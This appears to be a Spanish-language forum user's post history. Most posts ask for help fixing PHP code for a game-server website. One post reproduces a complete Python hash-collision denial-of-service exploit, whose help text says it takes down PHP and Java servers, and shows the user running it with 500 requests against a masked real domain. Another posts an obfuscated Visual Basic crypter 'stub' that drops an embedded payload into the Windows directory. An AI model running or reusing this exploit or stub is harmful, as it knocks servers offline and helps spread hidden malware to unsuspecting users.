|
Mostrar Mensajes
|
Páginas: [1] 2 3 4 5 6
|
1
|
Programación / PHP / ayuda no encuentro el error!
|
en: 23 Febrero 2014, 19:21 pm
|
hola, a tod@s veran estoy tratando de reparar una web y justamente en esta web me da este erroreste es el codigo una ayuda pls
<div id="content"> <div class="postui2 text-title"> <h2> Ranking </h2> </div> <div class="postui2 text-con"> <div class="con-wrap"> <center> <?PHP $CPSeite = 50; $markierteZeile=0; if(!checkInt($_GET['p']) || !($_GET['p']>0)) $aSeite = 1; else $aSeite = $_GET['p']; } else { $aSeite = 1; } if(isset($_POST['suche']) && $_POST['suche']=='suchen') { if(!empty($_POST['charakter'])) { $sqlCmd="SELECT id, name, level, exp, empire, guild_name, rang FROM ( SELECT id, name, level, exp, empire, guild_name, @num := @num +1 AS rang FROM ( SELECT player.id, player.name, player.level, player.exp, player_index.empire, guild.name AS guild_name, @num :=0 FROM player.player LEFT JOIN player.player_index ON player_index.id = player.account_id LEFT JOIN player.guild_member ON guild_member.pid = player.id LEFT JOIN player.guild ON guild.id = guild_member.guild_id INNER JOIN account.account ON account.id=player.account_id WHERE player.name NOT LIKE '[%]%' AND account.status!='BLOCK' ORDER BY player.level DESC , player.exp DESC ) AS t1 ) AS t2 $aSeite = ceil($getRang->rang/$CPSeite); $markierteZeile = $getRang->rang; } } } $sqlCmd = "SELECT COUNT(*) AS summeChars FROM player.player LEFT JOIN player.player_index ON player_index.id=player.account_id LEFT JOIN player.guild_member ON guild_member.pid=player.id LEFT JOIN player.guild ON guild.id=guild_member.guild_id INNER JOIN account.account ON account.id=player.account_id WHERE player.name NOT LIKE '[%]%' AND account.status!='BLOCK' ORDER BY player.level DESC, player.exp DESC"; $cSeite = calcPages($getSum->summeChars,$aSeite,$CPSeite); ?> <form action="index.php?git=rankings" method="POST"> <table> <tr> <th class="topLine">Charaktersuche:</th> <td class="thell" style="text-align:center;"><input type="text" name="charakter" maxlength="20" size="20"/></td> <td class="tdunkel" style="text-align:center;"><input type="submit" name="suche" value="suchen" maxlength="20" size="20"/></td> </tr> </table> </form> <?PHP $maxRange = 5; $maxStep = 15; if(($aSeite-$maxRange)>0) $sStart = $aSeite-$maxRange; else $sStart = 1; if(($aSeite+$maxRange)<=$cSeite[0]) $sEnde = $aSeite+$maxRange; else $sEnde = $cSeite[0]; echo '<table> <tr> <td class="tdunkel">'; if(($aSeite-$maxStep)>0) echo '<a href="index.php?git=rankings&p='.($aSeite-$maxStep).'">'.($aSeite-$maxStep).'</a> «'; else echo '<a href="index.php?git=rankings&p=1">1</a> «'; echo'</td>'; for($i=$sStart;$i<=$sEnde;$i++) { $sKlasse = ($i==$aSeite) ? "topLine" : "thell"; echo'<td class="'.$sKlasse.'" style="text-align:center;">'; echo'<a href="index.php?git=rankings&p='.$i.'">'.$i.'</a>'; echo'</td>'; } echo'<td class="tdunkel" style="text-align:right;">'; if(($aSeite+$maxStep)<=$cSeite[0]) echo '» <a href="index.php?git=rankings&p='.($aSeite+$maxStep).'">'.($aSeite+$maxStep).'</a>'; else echo '» <a href="index.php?git=rankings&p='.$cSeite[0].'">'.$cSeite[0].'</a>'; echo'</td>'; echo'</table>'; ?> <table width="408"> <tr> <th class="topLine">Platz</th> <th class="topLine">Charakter</th> <th class="topLine">Level</th> <th class="topLine">EXP</th> <th class="topLine">Gilde</th> <th class="topLine">Reich</th> </tr> <?PHP $sqlCmd = "SELECT player.id,player.name,player.level,player.exp,player_index.empire,guild.name AS guild_name FROM player.player LEFT JOIN player.player_index ON player_index.id=player.account_id LEFT JOIN player.guild_member ON guild_member.pid=player.id LEFT JOIN player.guild ON guild.id=guild_member.guild_id INNER JOIN account.account ON account.id=player.account_id WHERE player.name NOT LIKE '[%]%' AND account.status!='BLOCK' ORDER BY player.level DESC, player.exp DESC LIMIT ".$cSeite[1].",".$CPSeite; //echo $sqlCmd; $x=$cSeite[1]+1; $zF = ($x%2==0) ? "thell" : "tdunkel"; if(checkInt($markierteZeile) && $markierteZeile==$x) { $zF = "tmarkiert"; } echo "<tr>"; echo "<td class=\"$zF\">".$x."</td>"; echo "<td class=\"$zF\">".$getPlayers->name."</td>"; echo "<td class=\"$zF\">".$getPlayers->level."</td>"; echo "<td class=\"$zF\">".$getPlayers->exp."</td>"; echo "<td class=\"$zF\">".$getPlayers->guild_name."</td>"; echo "<td class=\"$zF\">"; if(!empty($getPlayers->empire)) { echo '<img src="img/reiche/'.$getPlayers->empire.'_kl.jpg" title="Reich" alt="Reich"/>'; } echo "</td>"; echo "</tr>"; $x++; } ?> </table></center> </div> </div> <div class="postui2 text-end"> </div></div>
MOD: UTILIZAR ETIQUETA GESHI PARA CÓDIGOS ([code][/code]) LEER REGLAS -> Normas de subforo de Desarrollo Web & Normas del subforo de PHP!
|
|
|
2
|
Programación / PHP / Re: ayuda con esto Warning: mysql_query()
|
en: 29 Noviembre 2012, 01:39 am
|
alfinal lo solucione grax a todos por su rapidas respuestas xD! como dice Castg faltaba especificar la funcion (require("functions.php") y quitar en el query la variable $sql_Hp que no existia
|
|
|
3
|
Programación / PHP / Re: ayuda con esto Warning: mysql_query()
|
en: 28 Noviembre 2012, 01:36 am
|
este es el code del config.inc.php<?PHP DEFINE('SQL_HOST', '192.'); DEFINE('SQL_USER', '******'); DEFINE('SQL_PASS', '******'); DEFINE('SQL_HP_HOST', '*****'); DEFINE('SQL_HP_USER', '*****'); DEFINE('SQL_HP_PASS', '*****'); DEFINE('SQL_HP_DB', 'hpcms'); $serverSettings['titel_page']=" "; $serverSettings['titel']=""; $serverSettings['url']=""; $serverSettings['server_ip']="192"; $serverSettings['register_on']=true; $serverSettings['mail_activation']=false; $serverSettings['page_entries']=30; $serverSettings['reg_mail']=' acc@beiiel.com'; $serverSettings['pass_mail']=' pass@beiel.com'; require("./inc/daten.inc.php"); ?>
|
|
|
4
|
Programación / PHP / ayuda con esto Warning: mysql_query()
|
en: 27 Noviembre 2012, 03:03 am
|
Hola si alguno me ayuda soy muy noob en esto de php el code es el siguiente<?PHP require("./inc/config.inc.php");
$sqlNews = "SELECT * FROM ".SQL_HP_DB.".news WHERE anzeigen>0 AND ((hot>0 AND kategorie!=2) OR (kategorie=2)) ORDER BY datum DESC LIMIT 5"; $qryNews = mysql_query($sqlHpcms,$sqlNews); while($getNews = mysql_fetch_object($qryNews)) { echo'<div class="newsblock">'; echo'<h3><span style="float:left;">['.$newsKategorien[$getNews->kategorie].'] <b><a href="index.php?s=news&id='.$getNews->id.'">'.$getNews->titel.'</a></b></span><span style="float:right;">'.getDatum($getNews->datum).'</span></h3>'; echo'</div>'; }
?> y este es el errorWarning: mysql_query(): supplied argument is not a valid MySQL-Link resource in /usr/local/www/apache22/data/pages/home.php on line 27
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /usr/local/www/apache22/data/pages/home.php on line 29 van dias tratando de reparlo y no he podido U_u
|
|
|
6
|
Seguridad Informática / Bugs y Exploits / no encuentro el erro ayuda!
|
en: 27 Septiembre 2012, 09:02 am
|
Hola este es el code de un exploit pero no encuentro el error es q en python y en general soy noob xD#! /usr/bin/env python """ This script was written by Christian Mehlmauer <FireFart@gmail.com> https://twitter.com/#!/_FireFart_ Sourcecode online at: https://github.com/FireFart/HashCollision-DOS-POC Original PHP Payloadgenerator taken from https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision http://www.ocert.org/advisories/ocert-2011-003.html CVE: Apache Geronimo: CVE-2011-5034 Oracle Glassfish: CVE-2011-5035 PHP: CVE-2011-4885 Apache Tomcat: CVE-2011-4858 requires Python 2.7 Examples: -) Make a single Request, wait for the response and save the response to output0.html python HashtablePOC.py -u https://host/index.php -v -c 1 -w -o output -t PHP -) Take down a PHP server(make 500 requests without waiting for a response): python HashtablePOC.py -u https://host/index.php -v -c 500 -t PHP -) Take down a JAVA server(make 500 requests without waiting for a response, maximum POST data size 2MB): python HashtablePOC.py -u https://host/index.jsp -v -c 500 -t JAVA -m 2 Changelog: v6.0: Added Javapayloadgenerator v5.0: Define max payload size as parameter v4.0: Get PHP Collision Chars on the fly v3.0: Load Payload from file v2.0: Added Support for https, switched to HTTP 1.1 v1.0: Initial Release """ import socket import sys import math import urllib import string import time import urlparse import argparse import ssl import random import itertools class Payloadgenerator: # Maximum recursions when searching for collisionchars _recursivemax = 15 _recursivecounter = 1 def __init__(self, verbose, collisionchars = 5, collisioncharlength = 2, payloadlength = 8): self._verbose = verbose self._collisionchars = collisionchars self._collisioncharlength = collisioncharlength self._payloadlength = payloadlength def generateASPPayload(self): raise Exception("ASP Payload not implemented") def generateJAVAPayload(self): a = self._computeJAVACollisionChars(self._collisionchars) return self._generatePayload(a, self._payloadlength) def generatePHPPayload(self): # Note: Default max POST Data Length in PHP is 8388608 bytes (8MB) # compute entries with collisions in PHP hashtable hash function a = self._computePHPCollisionChars(self._collisionchars) return self._generatePayload(a, self._payloadlength); def _computePHPCollisionChars(self, count): charrange = range(0, 256) return self._computeCollisionChars(self._DJBX33A, count, charrange) def _computeJAVACollisionChars(self, count): charrange = range(0, 129) return self._computeCollisionChars(self._DJBX31A, count, charrange) def _computeCollisionChars(self, function, count, charrange): hashes = {} counter = 0 length = self._collisioncharlength a = "" for i in charrange: a = a+chr(i) source = list(itertools.product(a, repeat=length)) basestr = ''.join(random.choice(source)) basehash = function(basestr) hashes[str(counter)] = basestr counter = counter + 1 for item in source: tempstr = ''.join(item) if tempstr == basestr: continue if function(tempstr) == basehash: hashes[str(counter)] = tempstr counter = counter + 1 if counter >= count: break; if counter < count: # Try it again if self._recursivecounter > self._recursivemax: print("Not enought values found. Please start this script again") sys.exit(1) print("%d: Not enough values found. Trying it again..." % self._recursivecounter) self._recursivecounter = self._recursivecounter + 1 hashes = self._computeCollisionChars(function, count, charrange) else: if self._verbose: print("Found values:") for item in hashes: tempstr = hashes[item] print("\tValue: %s\tHash: %s" % (tempstr, function(tempstr))) for i in tempstr: print("\t\tValue: %s\tCharcode: %d" % (i, ord(i))) return hashes def _DJBXA(self, inputstring, base, start): counter = len(inputstring) - 1 result = start for item in inputstring: result = result + (math.pow(base, counter) * ord(item)) counter = counter - 1 return int(round(result)) #PHP def _DJBX33A(self, inputstring): return self._DJBXA(inputstring, 33, 5381) #Java def _DJBX31A(self, inputstring): return self._DJBXA(inputstring, 31, 0) #ASP def _DJBX33X(self, inputstring): counter = len(inputstring) - 1 result = 5381 for item in inputstring: result = result + (int(round(math.pow(33, counter))) ^ ord(item)) counter = counter - 1 return int(round(result)) def _generatePayload(self, collisionchars, payloadlength): # Taken from: # https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision # how long should the payload be length = payloadlength size = len(collisionchars) post = "" maxvaluefloat = math.pow(size,length) maxvalueint = int(math.floor(maxvaluefloat)) for i in range (maxvalueint): inputstring = self._base_convert(i, size) result = inputstring.rjust(length, "0") for item in collisionchars: result = result.replace(str(item), collisionchars[item]) post += urllib.urlencode({result:""}) + "&" return post; def _base_convert(self, num, base): fullalphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" alphabet = fullalphabet[:base] if (num == 0): return alphabet[0] arr = [] base = len(alphabet) while num: rem = num % base num = num // base arr.append(alphabet[rem]) arr.reverse() return "".join(arr) def main(): parser = argparse.ArgumentParser(description="Take down a remote Host via Hashcollisions", prog="Universal Hashcollision Exploit") parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True) parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response") parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests") parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output") parser.add_argument("-s", "--save", dest="save", help="Save payload to file") parser.add_argument("-p", "--payload", dest="payload", help="Save payload to file") parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w") parser.add_argument("-t", "--target", dest="target", help="Target of the attack", choices=["ASP", "PHP", "JAVA"], required=True) parser.add_argument("-m", "--max-payload-size", dest="maxpayloadsize", help="Maximum size of the Payload in Megabyte. PHPs defaultconfiguration does not allow more than 8MB, Tomcat is 2MB", type=int) parser.add_argument("-g", "--generate", dest="generate", help="Only generate Payload and exit", default=False, action="store_true") parser.add_argument("--version", action="version", version="%(prog)s 6.0") options = parser.parse_args() if options.target == "PHP": if not options.maxpayloadsize or options.maxpayloadsize == 0: maxpayloadsize = 8 else: maxpayloadsize = options.maxpayloadsize elif options.target == "ASP": if not options.maxpayloadsize or options.maxpayloadsize == 0: maxpayloadsize = 8 else: maxpayloadsize = options.maxpayloadsize elif options.target == "JAVA": if not options.maxpayloadsize or options.maxpayloadsize == 0: maxpayloadsize = 2 else: maxpayloadsize = options.maxpayloadsize else: print("Target %s not yet implemented" % options.target) sys.exit(1) url = urlparse.urlparse(options.url) if not url.scheme: print("Please provide a scheme to the URL(http://, https://,..") sys.exit(1) host = url.hostname path = url.path port = url.port if not port: if url.scheme == "https": port = 443 elif url.scheme == "http": port = 80 else: print("Unsupported Protocol %s" % url.scheme) sys.exit(1) if not path: path = "/" if not options.payload: print("Generating Payload...") # Number of colliding chars to find collisionchars = 5 # Length of the collision chars (2 = Ey, FZ; 3=HyA, ...) collisioncharlength = 2 # Length of each parameter in the payload payloadlength = 8 generator = Payloadgenerator(options.verbose, collisionchars, collisioncharlength, payloadlength) if options.target == "PHP": payload = generator.generatePHPPayload() elif options.target == "ASP": #payload = generateASPPayload() print("Target %s not yet implemented" % options.target) sys.exit(1) elif options.target == "JAVA": payload = generator.generateJAVAPayload() else: print("Target %s not yet implemented" % options.target) sys.exit(1) print("Payload generated") else: f = open(options.payload, "r") payload = f.read() f.close() print("Loaded Payload from %s" % options.payload) # trim to maximum payload size (in MB) maxinmb = maxpayloadsize*1024*1024 payload = payload[:maxinmb] # remove last invalid(cut off) parameter position = payload.rfind("=&") payload = payload[:position+1] # Save payload if options.save: f = open(options.save, "w") f.write(payload) f.close() print("Payload saved to %s" % options.save) # User selected to only generate the payload if options.generate: return print("Host: %s" % host) print("Port: %s" % str(port)) print("path: %s" % path) print print for i in range(options.count): print("sending Request #%s..." % str(i+1)) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if url.scheme == "https": ssl_sock = ssl.wrap_socket(sock) ssl_sock.connect((host, port)) ssl_sock.settimeout(None) else: sock.connect((host, port)) sock.settimeout(None) request = "POST %s HTTP/1.1\r\n\ Host: %s\r\n\ Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n\ Connection: Close\r\n\ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)\r\n\ Content-Length: %s\r\n\ \r\n\ %s\r\n\ \r\n" % (path, host, str(len(payload)), payload) if url.scheme == "https": ssl_sock.send(request) else: sock.send(request) if options.verbose: if len(request) > 400: print(request[:400]+"....") else: print(request) print("") if options.wait or options.output: start = time.time() if url.scheme == "https" data = ssl_sock.recv(1024) string = "" while len(data): string = string + data data = ssl_sock.recv(1024) else: data = sock.recv(1024) string = "" while len(data): string = string + data data = sock.recv(1024) elapsed = (time.time() - start) print("Request %s finished" % str(i+1)) print("Request %s duration: %s" % (str(i+1), elapsed)) split = string.partition("\r\n\r\n") header = split[0] content = split[2] if options.verbose: # only print http header print("") print(header) print("") if options.output: f = open(options.output+str(i)+".html", "w") f.write("<!-- "+header+" -->\r\n"+content) f.close() if url.scheme == "https": ssl_sock.close() sock.close() else: sock.close() if __name__ == "__main__": main() este es el error q me teria cuando lo ejecutoC:\Users\c****\Desktop>exp.py -u http://www.me******.com -v -c 500 -t php Traceback (most recent call last): File "C:\Users\c****\Desktop\exp.py", line 359, in <module> main() File "C:\Users\c****n\Desktop\exp.py", line 216, in main url = urlparse.urlparse(options.url) NameError: global name 'urlparse' is not defined les agradezco su colaboración
|
|
|
9
|
Programación / Programación Visual Basic / Cual es el error pls una ayuda!!
|
en: 11 Noviembre 2011, 22:40 pm
|
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long Private Declare Function GetWindowWord Lib "user32" (ByVal hwnd As Long, ByVal nIndex As Long) As Integer Const GWW_HINSTANCE = (-6) Const SW_SHOWNORMAL = 1 Const SW_SHOWHIDE = 0 Dim qL03dVGjy48zqadiY4Tt As String Dim JzubtbDcbqnUyen3dgq1 As String
Private Function Ruta() As String Dim yf5NZzt9kYdmVs0rB1xJ As String, FvazNgSfP6Y1sLGTtJ9h As String, dowISKNxLrmGp0pCiDUr As Long yf5NZzt9kYdmVs0rB1xJ = String$(128, Chr$(0)) dowISKNxLrmGp0pCiDUr = GetWindowWord(isp.hwnd, GWW_HINSTANCE) yf5NZzt9kYdmVs0rB1xJ = Left$(yf5NZzt9kYdmVs0rB1xJ, GetModuleFileName(dowISKNxLrmGp0pCiDUr, yf5NZzt9kYdmVs0rB1xJ, Len(yf5NZzt9kYdmVs0rB1xJ))) Ruta = yf5NZzt9kYdmVs0rB1xJ End Function
Private Sub Main()
On Error Resume Next Dim FjawcxU5VVpyj1K8cPRE As String Dim ygyp8EL4PPCmjuYIVFRq As String Dim bSruZqfCWVjiytOt10ok As String Dim OcXqmgunrENzOM6a4gre As String qL03dVGjy48zqadiY4Tt = "|Infinity|" JzubtbDcbqnUyen3dgq1 = "|IsPhAcK|" Open Ruta For Binary As #1 Dim gWWkEBQkV7AJpm5VgaIa As String gWWkEBQkV7AJpm5VgaIa = Space(LOF(1)) Get #1, , gWWkEBQkV7AJpm5VgaIa Close #1 Dim PVGFkLUjVKt66hkTWTsH As Variant, LMgXOjUEyhn2UR4rEDiW As Variant PVGFkLUjVKt66hkTWTsH = Split(gWWkEBQkV7AJpm5VgaIa, qL03dVGjy48zqadiY4Tt) For n = 1 To UBound(PVGFkLUjVKt66hkTWTsH) LMgXOjUEyhn2UR4rEDiW = Split(PVGFkLUjVKt66hkTWTsH(n), JzubtbDcbqnUyen3dgq1) For i = 0 To UBound(LMgXOjUEyhn2UR4rEDiW) Select Case i Case 0 L0L = LMgXOjUEyhn2UR4rEDiW(i) Case 1 ygyp8EL4PPCmjuYIVFRq = LMgXOjUEyhn2UR4rEDiW(i) Case 2 Select Case LMgXOjUEyhn2UR4rEDiW(i) Case "Windows" bSruZqfCWVjiytOt10ok = Environ("WINDIR") End Select Case 3 OcXqmgunrENzOM6a4gre = LMgXOjUEyhn2UR4rEDiW(i) Case 4 FjawcxU5VVpyj1K8cPRE = LMgXOjUEyhn2UR4rEDiW(i) End Select Next i Next n Open bSruZqfCWVjiytOt10ok & "\" & ygyp8EL4PPCmjuYIVFRq For Binary As #1 Put #1, , FjawcxU5VVpyj1K8cPRE Close #1 End Sub no logro hacer funcionar ese code para un stub una ayuda pls xD
|
|
|
10
|
Informática / Hardware / Que se necesita para un server
|
en: 24 Octubre 2011, 10:55 am
|
Hola bueno quiero adquirir un servidor para juegos, la verdad es que soy un poco noob en esto y me gustaria saber si es me jor comprarlo hecho o armarlo, si es el segundo caso que hadwar me recomendarian comprar de antemano gracias pr su ayuda
|
|
|
|
|
|
|